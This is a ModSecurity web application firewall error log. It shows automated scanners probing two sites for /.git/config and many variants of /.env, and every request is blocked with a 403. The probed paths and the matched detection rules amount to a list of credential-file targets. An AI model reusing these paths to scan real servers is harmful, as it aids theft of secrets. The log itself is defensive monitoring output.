[Wed Sep 10 02:57:43.156146 2025] [:error] [pid 2612821] [client 93.123.109.7:45322] [client 93.123.109.7] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aMDNB84XEr2btaDRi2krpwAAAAI"]
[Wed Sep 10 02:57:43.156325 2025] [:error] [pid 2612821] [client 93.123.109.7:45322] [client 93.123.109.7] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aMDNB84XEr2btaDRi2krpwAAAAI"]
[Wed Sep 10 11:55:39.486105 2025] [:error] [pid 2617022] [client 185.165.171.225:60932] [client 185.165.171.225] ModSecurity: Warning. Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "914"] [id "920420"] [msg "Request content type is not allowed by policy"] [data "application/scim+json-H"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/CONTENT_TYPE_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "economiasolidale.38121.it"] [uri "/scim/Users"] [unique_id "aMFLGx5e1iLGGHbQEhX6rgAAAAY"]
[Wed Sep 10 11:55:39.486958 2025] [:error] [pid 2617022] [client 185.165.171.225:60932] [client 185.165.171.225] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/scim/Users"] [unique_id "aMFLGx5e1iLGGHbQEhX6rgAAAAY"]
[Wed Sep 10 11:55:39.487143 2025] [:error] [pid 2617022] [client 185.165.171.225:60932] [client 185.165.171.225] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/scim/Users"] [unique_id "aMFLGx5e1iLGGHbQEhX6rgAAAAY"]
[Wed Sep 10 23:09:47.942802 2025] [:error] [pid 2615395] [client 195.178.110.161:45238] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMHpG942iVVGuiqPOEpQMAAAAAA"]
[Wed Sep 10 23:09:47.943085 2025] [:error] [pid 2615395] [client 195.178.110.161:45238] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMHpG942iVVGuiqPOEpQMAAAAAA"]
[Wed Sep 10 23:09:47.943645 2025] [:error] [pid 2615395] [client 195.178.110.161:45238] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMHpG942iVVGuiqPOEpQMAAAAAA"]
[Wed Sep 10 23:09:48.203230 2025] [:error] [pid 2632346] [client 195.178.110.161:45240] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aMHpHGDwVr978sPtimA7XQAAAAg"]
[Wed Sep 10 23:09:48.203474 2025] [:error] [pid 2632346] [client 195.178.110.161:45240] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aMHpHGDwVr978sPtimA7XQAAAAg"]
[Wed Sep 10 23:09:48.203636 2025] [:error] [pid 2632346] [client 195.178.110.161:45240] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aMHpHGDwVr978sPtimA7XQAAAAg"]
[Wed Sep 10 23:09:53.283602 2025] [:error] [pid 2615397] [client 195.178.110.161:45256] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aMHpIaf6TyPfHtwqceCGlgAAAAI"]
[Wed Sep 10 23:09:53.283859 2025] [:error] [pid 2615397] [client 195.178.110.161:45256] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aMHpIaf6TyPfHtwqceCGlgAAAAI"]
[Wed Sep 10 23:09:53.284369 2025] [:error] [pid 2615397] [client 195.178.110.161:45256] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aMHpIaf6TyPfHtwqceCGlgAAAAI"]
[Wed Sep 10 23:09:53.498805 2025] [:error] [pid 2615411] [client 195.178.110.161:45260] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aMHpIftCvy4qJPhFFahrjgAAAAU"]
[Wed Sep 10 23:09:53.499044 2025] [:error] [pid 2615411] [client 195.178.110.161:45260] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aMHpIftCvy4qJPhFFahrjgAAAAU"]
[Wed Sep 10 23:09:53.499210 2025] [:error] [pid 2615411] [client 195.178.110.161:45260] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aMHpIftCvy4qJPhFFahrjgAAAAU"]
[Wed Sep 10 23:09:53.754211 2025] [authz_core:error] [pid 2615396] [client 195.178.110.161:45264] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Wed Sep 10 23:09:53.994613 2025] [:error] [pid 2615399] [client 195.178.110.161:45268] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aMHpIYqgikL8PuMm3zQnnAAAAAQ"]
[Wed Sep 10 23:09:53.994847 2025] [:error] [pid 2615399] [client 195.178.110.161:45268] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aMHpIYqgikL8PuMm3zQnnAAAAAQ"]
[Wed Sep 10 23:09:53.994994 2025] [:error] [pid 2615399] [client 195.178.110.161:45268] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aMHpIYqgikL8PuMm3zQnnAAAAAQ"]
[Wed Sep 10 23:09:55.280138 2025] [:error] [pid 2615395] [client 195.178.110.161:45310] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aMHpI942iVVGuiqPOEpQMQAAAAA"]
[Wed Sep 10 23:09:55.280389 2025] [:error] [pid 2615395] [client 195.178.110.161:45310] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aMHpI942iVVGuiqPOEpQMQAAAAA"]
[Wed Sep 10 23:09:55.280560 2025] [:error] [pid 2615395] [client 195.178.110.161:45310] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aMHpI942iVVGuiqPOEpQMQAAAAA"]
[Wed Sep 10 23:09:55.482125 2025] [:error] [pid 2632346] [client 195.178.110.161:45316] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aMHpI2DwVr978sPtimA7XgAAAAg"]
[Wed Sep 10 23:09:55.482381 2025] [:error] [pid 2632346] [client 195.178.110.161:45316] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aMHpI2DwVr978sPtimA7XgAAAAg"]
[Wed Sep 10 23:09:55.482535 2025] [:error] [pid 2632346] [client 195.178.110.161:45316] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aMHpI2DwVr978sPtimA7XgAAAAg"]
[Wed Sep 10 23:10:00.696766 2025] [:error] [pid 2615397] [client 195.178.110.161:53146] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aMHpKKf6TyPfHtwqceCGlwAAAAI"]
[Wed Sep 10 23:10:00.697006 2025] [:error] [pid 2615397] [client 195.178.110.161:53146] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aMHpKKf6TyPfHtwqceCGlwAAAAI"]
[Wed Sep 10 23:10:00.697186 2025] [:error] [pid 2615397] [client 195.178.110.161:53146] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aMHpKKf6TyPfHtwqceCGlwAAAAI"]
[Thu Sep 11 05:42:51.041947 2025] [:error] [pid 2641810] [client 198.55.98.93:46912] [client 198.55.98.93] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aMJFO5yTQF_NsWhvrdiQOQAAAAQ"]
[Thu Sep 11 05:42:51.042218 2025] [:error] [pid 2641810] [client 198.55.98.93:46912] [client 198.55.98.93] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aMJFO5yTQF_NsWhvrdiQOQAAAAQ"]
[Thu Sep 11 05:42:51.042434 2025] [:error] [pid 2641810] [client 198.55.98.93:46912] [client 198.55.98.93] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aMJFO5yTQF_NsWhvrdiQOQAAAAQ"]
[Thu Sep 11 06:42:52.740663 2025] [:error] [pid 2641810] [client 176.65.148.43:48108] [client 176.65.148.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMJTTJyTQF_NsWhvrdiQPwAAAAQ"]
[Thu Sep 11 06:42:52.740904 2025] [:error] [pid 2641810] [client 176.65.148.43:48108] [client 176.65.148.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMJTTJyTQF_NsWhvrdiQPwAAAAQ"]
[Thu Sep 11 06:42:52.741069 2025] [:error] [pid 2641810] [client 176.65.148.43:48108] [client 176.65.148.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMJTTJyTQF_NsWhvrdiQPwAAAAQ"]
[Thu Sep 11 12:47:39.046652 2025] [:error] [pid 2641899] [client 93.123.109.81:44264] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aMKoy6D2sArKbMCtkQQRMgAAAAY"]
[Thu Sep 11 12:47:39.046894 2025] [:error] [pid 2641899] [client 93.123.109.81:44264] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aMKoy6D2sArKbMCtkQQRMgAAAAY"]
[Thu Sep 11 12:47:39.047052 2025] [:error] [pid 2641899] [client 93.123.109.81:44264] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aMKoy6D2sArKbMCtkQQRMgAAAAY"]
[Thu Sep 11 12:47:39.353718 2025] [:error] [pid 2641809] [client 93.123.109.81:44272] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aMKoy-EVWQ_asFH7Xv3-QAAAAAM"]
[Thu Sep 11 12:47:39.353958 2025] [:error] [pid 2641809] [client 93.123.109.81:44272] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aMKoy-EVWQ_asFH7Xv3-QAAAAAM"]
